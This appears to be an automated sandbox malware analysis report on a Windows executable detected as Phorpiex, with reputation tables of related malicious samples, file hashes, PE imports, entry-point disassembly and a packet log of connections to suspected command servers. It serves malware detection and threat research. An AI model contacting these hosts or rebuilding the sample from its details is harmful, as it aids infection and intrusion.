            https://trk.klclick2.com/ls/click?upn=HVRWduvhL1zapb3BWQOCNiPIi5Bk5xLLCIGZPop7usQOZKKmWM-2FwHVR04uMIbc47xtIdXZ70-2BNqYC0slo1nan2opQ-2B0-2BSPXYqBzVTOGvUKZN1SahTtz7QmlDPDVfDJipVY4C-2F3dQtPrOpXEgvo4fCQS15iHO9tJjGaId-2FMb-2FkgM-3D4tc5_UQf6CZtgTiGkpBx1ujDHnZAntAuJNxWSG9pjq-2BiEMRDParvahGK2lvPcgi8z-2B-2BWUg4E10bFWhVQPx2J677B6FBKUouSDfFq-2BrhMyxGoFM-2F8OlmejfVTB4PqW6-2FjNChjlUMO-2B-2FXHCYyxLE0zjL9eSFxVBB0U-2BL17Utt4sh-2FoCed8SEzD2sagFG2abKMXdNJ7z8B3sNYIOWG1DEb4GIJgIUqTnJWFBPsjyTZTwjWh2fasTBMud-2BGFZmMBlUYhzyNDWqusvN0q6yzs-2FKzKyCsUKXO9RIzb-2BVNG2oBtNCXWQ548tUzZf1t-2BzLfcHu0MWrm9yF196hpRfidigA7rGe80R-2BoMR4Lt3-2FiXqfBcW2Jf0CqPCxxO-2FMbOmIF5KHqthpQWlSTMx2RinslX-2FyLyq256AseNlyUEOcYp4MVdxlFD5M9JY18wec3WYUGH5-2BObD18daomOPH2b-2FLqYgYJdnS4m0Rg-3D-3D#am9lLm1lbm5pbmdlckB5b3VyYmVzdGN1LmNvbQ====qaivbcvwqpmzofncfib=Z29vZ2xlLmNvbQ==&d=DwMGaQGet hashmaliciousHTMLPhisherBrowse
            • 51.81.42.250
            stub.exeGet hashmaliciousAsyncRATBrowse
            • 51.195.251.9
            DATAWAGONUShttp://104.192.3.74Get hashmaliciousUnknownBrowse
            • 104.192.3.74
            jAgj6bRWaJ.elfGet hashmaliciousMirai, MoobotBrowse
            • 104.224.1.83
            bLnG.exeGet hashmaliciousQuasarBrowse
            • 104.219.234.167
            ONKp7JSC5S.elfGet hashmaliciousMiraiBrowse
            • 104.224.1.58
            Qp0NtYJBeV.exeGet hashmaliciousQuasar, Vermin KeyloggerBrowse
            • 172.81.131.113
            9o7IiBFnFS.exeGet hashmaliciousEICAR, Vermin KeyloggerBrowse
            • 172.81.131.113
            jD4JWHlWlw.exeGet hashmaliciousAveMaria, EICAR, UACMe, Vermin KeyloggerBrowse
            • 172.81.131.113
            SecuriteInfo.com.Trojan.PWS.Steam.33515.21594.25697.exeGet hashmaliciousRedLineBrowse
            • 104.192.2.242
            file.exeGet hashmaliciousAmadey, RedLineBrowse
            • 104.192.2.242
            O6tQQyRId9.exeGet hashmaliciousAmadey, CryptOne, RedLineBrowse
            • 104.192.2.242
            aO3OP6lo9T.exeGet hashmaliciousRedLineBrowse
            • 104.192.2.242
            nCguwHABqhXZAo.dll.dllGet hashmaliciousBumbleBeeBrowse
            • 104.219.233.38
            nCguwHABqhXZAo.dll.dllGet hashmaliciousBumbleBeeBrowse
            • 104.219.233.38
            x8TZhOscJi.exeGet hashmaliciousRedLineBrowse
            • 104.192.2.242
            dMvOmUQpUL.exeGet hashmaliciousRedLineBrowse
            • 104.192.2.242
            5vzS8wok7q.exeGet hashmaliciousNeshta, RedLineBrowse
            • 104.192.2.242
            rXDInw0GtH.exeGet hashmaliciousRedLineBrowse
            • 104.192.2.242
            file.exeGet hashmaliciousDanaBot, RedLine, SmokeLoaderBrowse
            • 172.81.129.182
            Specification&Drawaing&Size&Quantity.exeGet hashmaliciousRedLineBrowse
            • 104.224.30.55
            kLXwf9JGfEGet hashmaliciousMiraiBrowse
            • 104.224.1.77
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            fc54e0d16d9764783542f0146a98b3002oK.exeGet hashmaliciousDCRatBrowse
            • 149.56.44.47
            • 172.81.131.84
            • 207.244.78.230
            • 66.175.235.244
            EYBfU.exeGet hashmaliciousDCRatBrowse
            • 149.56.44.47
            • 172.81.131.84
            • 207.244.78.230
            • 66.175.235.244
            KK63Cn92dU.exeGet hashmaliciousPhonk Miner, XmrigBrowse
            • 149.56.44.47
            • 172.81.131.84
            • 207.244.78.230
            • 66.175.235.244
            Yhx3rg6GE4.exeGet hashmaliciousPhonk Miner, Xmrig, zgRATBrowse
            • 149.56.44.47
            • 172.81.131.84
            • 207.244.78.230
            • 66.175.235.244
            G3KugQ8kiX.exeGet hashmaliciousPhonk Miner, Xmrig, zgRATBrowse
            • 149.56.44.47
            • 172.81.131.84
            • 207.244.78.230
            • 66.175.235.244
            K92v0CujUu.exeGet hashmaliciousParallax RAT, Phonk Miner, XmrigBrowse
            • 149.56.44.47
            • 172.81.131.84
            • 207.244.78.230
            • 66.175.235.244
            yD4vgUNMMb.exeGet hashmaliciousParallax RAT, Phonk Miner, Xmrig, zgRATBrowse
            • 149.56.44.47
            • 172.81.131.84
            • 207.244.78.230
            • 66.175.235.244
            PtUWVASbnv.exeGet hashmaliciousParallax RAT, Phonk Miner, Xmrig, zgRATBrowse
            • 149.56.44.47
            • 172.81.131.84
            • 207.244.78.230
            • 66.175.235.244
            0817.exeGet hashmaliciousAsyncRATBrowse
            • 149.56.44.47
            • 172.81.131.84
            • 207.244.78.230
            • 66.175.235.244
            0821-1351.exeGet hashmaliciousAsyncRATBrowse
            • 149.56.44.47
            • 172.81.131.84
            • 207.244.78.230
            • 66.175.235.244
            0815.exeGet hashmaliciousAsyncRATBrowse
            • 149.56.44.47
            • 172.81.131.84
            • 207.244.78.230
            • 66.175.235.244
            0808-1427.exeGet hashmaliciousAsyncRATBrowse
            • 149.56.44.47
            • 172.81.131.84
            • 207.244.78.230
            • 66.175.235.244
            HEUR-Trojan-Spy.MSIL.Stealer.gen-34669303b457.exeGet hashmaliciousDCRatBrowse
            • 149.56.44.47
            • 172.81.131.84
            • 207.244.78.230
            • 66.175.235.244
            farc75O3fe.exeGet hashmaliciousUnknownBrowse
            • 149.56.44.47
            • 172.81.131.84
            • 207.244.78.230
            • 66.175.235.244
            25DB06AABF72392BE5659C5E97F6202AFFC2601F2A49D.exeGet hashmaliciousRedLineBrowse
            • 149.56.44.47
            • 172.81.131.84
            • 207.244.78.230
            • 66.175.235.244
            5BImyJbP7u.exeGet hashmaliciousRaccoon Stealer v2Browse
            • 149.56.44.47
            • 172.81.131.84
            • 207.244.78.230
            • 66.175.235.244
            95b3PKNWql.exeGet hashmaliciousRaccoon Stealer v2Browse
            • 149.56.44.47
            • 172.81.131.84
            • 207.244.78.230
            • 66.175.235.244
            HEUR-Backdoor.MSIL.LightStone.gen-6176ead8802.exeGet hashmaliciousDCRatBrowse
            • 149.56.44.47
            • 172.81.131.84
            • 207.244.78.230
            • 66.175.235.244
            file.exeGet hashmaliciousUnknownBrowse
            • 149.56.44.47
            • 172.81.131.84
            • 207.244.78.230
            • 66.175.235.244
            file.exeGet hashmaliciousUnknownBrowse
            • 149.56.44.47
            • 172.81.131.84
            • 207.244.78.230
            • 66.175.235.244
            No context
            Process:C:\Users\user\Desktop\6K1uYM85lS.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):114688
            Entropy (8bit):6.615566232216998
            Encrypted:false
            SSDEEP:3072:8q7DiX2FNAVWllSP8QLZwgtTIFFjB/0SA:N7DiQWTlZw3FjJA
            MD5:2D5E7BABF1B2D92B56FDA0B9044F889A
            SHA1:D2F1F6A1E267172FC183A0D1A2AFFDD26145F59D
            SHA-256:8CD916321F1C8A63BD9FAFB52A478AC65B3E86A33966BBFCE60F5E46FFEE6B8C
            SHA-512:68167664FC5E957B9AEE18713DDF975823A73713D6C2FE31F532DCB53BEE280A7FBFDA68961A514D049558C602D74E91B24995FC1153E3F376CEA5EBC7F93688
            Malicious:true
            Yara Hits:
            • Rule: MALWARE_Win_Phorpiex, Description: Detects Phorpiex variants, Source: C:\180771693628709\lsass.exe, Author: ditekSHen
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 72%
            Reputation:low
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........D...D...D...cQ..G...cQ..V...D.......+...G......F...+...O...Z.].E...Z.H.E...RichD...........................PE..L.....`.................6...\......zB.......P....@.......................................@..................................w..................................|....S...............................................P...............................text....4.......6.................. ..`.rdata...6...P...8...:..............@..@.data...\............r..............@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):6.615566232216998
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:6K1uYM85lS.exe
            File size:114'688 bytes
            MD5:2d5e7babf1b2d92b56fda0b9044f889a
            SHA1:d2f1f6a1e267172fc183a0d1a2affdd26145f59d
            SHA256:8cd916321f1c8a63bd9fafb52a478ac65b3e86a33966bbfce60f5e46ffee6b8c
            SHA512:68167664fc5e957b9aee18713ddf975823a73713d6c2fe31f532dcb53bee280a7fbfda68961a514d049558c602d74e91b24995fc1153e3f376cea5ebc7f93688
            SSDEEP:3072:8q7DiX2FNAVWllSP8QLZwgtTIFFjB/0SA:N7DiQWTlZw3FjJA
            TLSH:12B35B22E511C53DF46101B7DBBAA9BF6A28AD30130530C3F3D06DE66A659E27D3026F
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........D...D...D...cQ..G...cQ..V...D.......+...G.......F...+...O...Z.].E...Z.H.E...RichD...........................PE..L......`...
            Icon Hash:00928e8e8686b000
            Entrypoint:0x41427a
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Time Stamp:0x6080EED3 [Thu Apr 22 03:34:43 2021 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:0
            File Version Major:5
            File Version Minor:0
            Subsystem Version Major:5
            Subsystem Version Minor:0
            Import Hash:23ab644c44593e426ea915e5618d637d
            Instruction
            push ebp
            mov ebp, esp
            push FFFFFFFFh
            push 00417778h
            push 00414400h
            mov eax, dword ptr fs:[00000000h]
            push eax
            mov dword ptr fs:[00000000h], esp
            sub esp, 68h
            push ebx
            push esi
            push edi
            mov dword ptr [ebp-18h], esp
            xor ebx, ebx
            mov dword ptr [ebp-04h], ebx
            push 00000002h
            call dword ptr [00415184h]
            pop ecx
            or dword ptr [0041A350h], FFFFFFFFh
            or dword ptr [0041A354h], FFFFFFFFh
            call dword ptr [00415188h]
            mov ecx, dword ptr [0041A34Ch]
            mov dword ptr [eax], ecx
            call dword ptr [0041518Ch]
            mov ecx, dword ptr [0041A348h]
            mov dword ptr [eax], ecx
            mov eax, dword ptr [00415190h]
            mov eax, dword ptr [eax]
            mov dword ptr [0041A358h], eax
            call 00007FBA547CC535h
            cmp dword ptr [00419D90h], ebx
            jne 00007FBA547CC42Eh
            push 004143F6h
            call dword ptr [00415194h]
            pop ecx
            call 00007FBA547CC507h
            push 0041900Ch
            push 00419008h
            call 00007FBA547CC4F2h
            mov eax, dword ptr [0041A344h]
            mov dword ptr [ebp-6Ch], eax
            lea eax, dword ptr [ebp-6Ch]
            push eax
            push dword ptr [0041A340h]
            lea eax, dword ptr [ebp-64h]
            push eax
            lea eax, dword ptr [ebp-70h]
            push eax
            lea eax, dword ptr [ebp-60h]
            push eax
            call dword ptr [0041519Ch]
            push 00419004h
            push 00419000h
            call 00007FBA547CC4BFh
            Programming Language:
            • [ C ] VS2005 build 50727
            • [IMP] VS2005 build 50727
            • [C++] VS2008 build 21022
            • [LNK] VS2008 build 21022
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x177b40xdc.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1b0000x1b4.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1c0000x107c.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x153100x1c.rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x150000x304.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x134180x13600False0.46165574596774195data6.130960356629228IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x150000x36ae0x3800False0.5006277901785714data5.464324159889571IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0x190000x135c0xe00False0.44252232142857145Matlab v4 mat-file (little endian) \377\377\377\377\311\017\332\242!h\3024\304\306b\213\200\334\034\321)\002N\010\212g\314t\002\013\276\246;\023\233"QJ\010y\2164\004\335\357\225\031\263\315:C\0330+, numeric, rows 0, columns 04.877874103524275IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x1b0000x1b40x200False0.490234375data5.105006099278344IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x1c0000x121e0x1400False0.7033203125data6.1436459997367185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_MANIFEST0x1b0580x15aASCII text, with CRLF line terminatorsEnglishUnited States0.5491329479768786
            DLLImport
            MSVCRT.dll_controlfp, memmove, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, wcscmp, srand, rand, mbstowcs, strchr, strcmp, _wfopen, fseek, ftell, fclose, memset, _mbsstr, strlen, isalpha, isdigit, wcsstr, wcslen, iswalpha, iswdigit, memcpy, ??3@YAXPAX@Z, ??2@YAPAXI@Z, strtol, memchr, memcmp
            WININET.dllInternetCloseHandle, InternetOpenUrlA, InternetOpenA, HttpQueryInfoA, InternetOpenUrlW, InternetOpenW, InternetReadFile
            urlmon.dllURLDownloadToFileW
            SHLWAPI.dllPathMatchSpecW, StrCmpNW, PathFileExistsW, PathFindFileNameW, PathFileExistsA
            WS2_32.dllsetsockopt, send, getaddrinfo, recv, socket, connect, closesocket, listen, bind, htonl, htons, inet_pton, ntohl, shutdown, WSACleanup, WSAStartup, getsockname, ntohs, WSAAccept, WSARecv, WSASend, WSAGetLastError, freeaddrinfo, inet_ntop
            KERNEL32.dllGlobalAlloc, GlobalLock, GlobalUnlock, WaitForMultipleObjects, GetQueuedCompletionStatus, PostQueuedCompletionStatus, LoadLibraryA, GetProcAddress, lstrlenW, TerminateThread, CloseHandle, CreateIoCompletionPort, SleepEx, SetLastError, GlobalFree, GetSystemTimeAsFileTime, GetTickCount, lstrcpynA, ExitThread, SetEndOfFile, SetFilePointer, UnmapViewOfFile, MapViewOfFile, CreateFileMappingA, GetFileSize, CreateFileW, CreateProcessW, GetLocaleInfoA, DeleteFileW, WriteFile, ExpandEnvironmentStringsW, lstrcpyW, QueryDosDeviceW, GetDriveTypeW, GetLogicalDrives, RemoveDirectoryW, FindClose, FindNextFileW, MoveFileExW, lstrcmpW, WaitForSingleObject, GetLastError, GetStartupInfoA, GetModuleHandleA, MoveFileW, MoveFileA, DeleteFileA, ExitProcess, CreateMutexA, CopyFileA, CreateThread, GetTempPathW, GetModuleFileNameW, GetVolumeInformationW, SetFileAttributesW, CopyFileW, lstrcmpiW, CreateDirectoryW, lstrlenA, Sleep, HeapReAlloc, HeapAlloc, HeapFree, GetProcessHeap, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, FindFirstFileW
            USER32.dllFindWindowA, ShowWindow, SetForegroundWindow, CloseWindow, SetFocus, wsprintfA, wsprintfW, GetClipboardData, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard
            ADVAPI32.dllCryptReleaseContext, CryptGenRandom, CryptEncrypt, CryptDestroyKey, CryptGetKeyParam, CryptImportKey, CryptSetKeyParam, CryptDestroyHash, CryptHashData, CryptCreateHash, CryptGetHashParam, CryptDuplicateHash, CryptExportKey, CryptVerifySignatureA, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, RegCreateKeyExA, RegSetValueExA, RegOpenKeyExA, RegSetValueExW, CryptAcquireContextW, CryptAcquireContextA
            SHELL32.dllShellExecuteW
            ole32.dllCoInitializeEx, CoCreateInstance
            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States
            TimestampSource PortDest PortSource IPDest IP
            Jan 10, 2024 15:38:25.024310112 CET4971980192.168.2.6185.215.113.93
            Jan 10, 2024 15:38:25.266236067 CET8049719185.215.113.93192.168.2.6
            Jan 10, 2024 15:38:25.266447067 CET4971980192.168.2.6185.215.113.93
            Jan 10, 2024 15:38:25.268291950 CET4971980192.168.2.6185.215.113.93
            Jan 10, 2024 15:38:25.509552956 CET8049719185.215.113.93192.168.2.6
            Jan 10, 2024 15:38:25.509865999 CET8049719185.215.113.93192.168.2.6
            Jan 10, 2024 15:38:25.510082960 CET4971980192.168.2.6185.215.113.93
            Jan 10, 2024 15:38:26.519258022 CET4971980192.168.2.6185.215.113.93
            Jan 10, 2024 15:38:26.760432005 CET8049719185.215.113.93192.168.2.6
            Jan 10, 2024 15:38:26.760479927 CET8049719185.215.113.93192.168.2.6
            Jan 10, 2024 15:38:26.761126041 CET4971980192.168.2.6185.215.113.93
            Jan 10, 2024 15:38:27.946547031 CET4971980192.168.2.6185.215.113.93
            Jan 10, 2024 15:38:28.189996004 CET8049719185.215.113.93192.168.2.6
            Jan 10, 2024 15:38:28.190026999 CET8049719185.215.113.93192.168.2.6
            Jan 10, 2024 15:38:28.190318108 CET4971980192.168.2.6185.215.113.93
            Jan 10, 2024 15:38:30.354223967 CET4971980192.168.2.6185.215.113.93
            Jan 10, 2024 15:38:30.595370054 CET8049719185.215.113.93192.168.2.6
            Jan 10, 2024 15:38:30.595449924 CET4971980192.168.2.6185.215.113.93
            Jan 10, 2024 15:38:31.611371994 CET4971980192.168.2.6185.215.113.93
            Jan 10, 2024 15:38:31.852922916 CET8049719185.215.113.93192.168.2.6
            Jan 10, 2024 15:38:31.853020906 CET4971980192.168.2.6185.215.113.93
            Jan 10, 2024 15:38:32.863312960 CET4971980192.168.2.6185.215.113.93
            Jan 10, 2024 15:38:33.104935884 CET8049719185.215.113.93192.168.2.6
            Jan 10, 2024 15:38:33.105077982 CET4971980192.168.2.6185.215.113.93
            Jan 10, 2024 15:38:59.954801083 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.160960913 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.161066055 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.161336899 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.367526054 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.375082016 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.375094891 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.375107050 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.375118971 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.375173092 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.375173092 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.375226021 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.375226021 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.375253916 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.375300884 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.379215956 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.379230022 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.379271984 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.379272938 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.379312038 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.379312992 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.379407883 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.379451990 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.581268072 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.581289053 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.581341028 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.581374884 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.581413031 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.581423998 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.581478119 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.581513882 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.581568003 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.581588984 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.581650019 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.581680059 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.581811905 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.581823111 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.581934929 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.581984997 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.582117081 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.582202911 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.582236052 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.582269907 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.582302094 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.582685947 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.585156918 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.585175991 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.585308075 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.585340023 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.585370064 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.585405111 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.585484982 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.585537910 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.585618019 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.585702896 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.585803032 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.585853100 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.793266058 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.793293953 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.793307066 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.793318987 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.793337107 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.793416023 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.793417931 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.793417931 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.793431997 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.793457985 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.793484926 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.793486118 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.793530941 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.793535948 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.793576002 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.793598890 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.793653011 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.793657064 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.793682098 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.793704987 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.793704987 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.793725967 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.793746948 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.793874025 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.793898106 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.793910027 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.793924093 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.793951988 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.793976068 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.794019938 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.794019938 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.794099092 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.794112921 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.794145107 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.794173956 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.794943094 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.794985056 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.794997931 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.795008898 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.795039892 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.795041084 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.795039892 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.795088053 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.795131922 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.795176029 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.795243979 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.795285940 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.798846006 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.798898935 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.798924923 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.798938036 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.798953056 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.798976898 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.798978090 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.798990965 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.799025059 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.799057007 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.799073935 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.799082041 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.799118996 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.799150944 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.799164057 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.799186945 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.799195051 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.799230099 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.799232960 CET497269030192.168.2.6193.11.164.243
            Jan 10, 2024 15:39:00.799268007 CET903049726193.11.164.243192.168.2.6
            Jan 10, 2024 15:39:00.799268961 CET497269030192.168.2.6193.11.164.243
